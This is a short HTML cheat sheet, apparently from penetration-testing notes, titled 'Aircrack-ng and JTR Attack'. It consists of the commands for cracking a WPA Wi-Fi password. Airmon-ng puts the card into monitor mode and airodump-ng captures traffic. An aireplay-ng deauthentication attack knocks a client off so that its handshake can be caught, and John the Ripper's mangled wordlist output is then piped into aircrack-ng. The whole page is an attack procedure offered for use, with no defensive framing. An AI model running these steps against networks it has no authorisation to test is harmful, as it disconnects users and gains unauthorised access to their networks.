<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Aircrack-ng and JTR Attack</title>
</head><body>Aircrack-ng and JTR Attack<br/>
---------------------------<br/>
<br/>
Place your wireless card into monitor mode on the channel number of the AP:<br/>
<br/>
airmon-ng start &lt;interface&gt; &lt;AP channel&gt;<br/>
<br/>
Start an Airodump capture, filtering on the AP channel and BSSID, saving the capture to<br/>
disk:<br/>
<br/>
airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;<br/>
<br/>
Force a client to reconnect and complete the 4-way handshake by running a<br/>
deauthentication attack against it:<br/>
<br/>
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;<br/>
<br/>
Once a handshake has been captured, change to the John the Ripper directory and pipe in<br/>
the mangled words into Aircrack-ng to obtain the WPA password:<br/>
<br/>
./john --wordlist=&lt;wordlist&gt; --rules --stdout | aircrack-ng -e &lt;ESSID&gt; -w -<br/>
&lt;capture&gt;</body></html>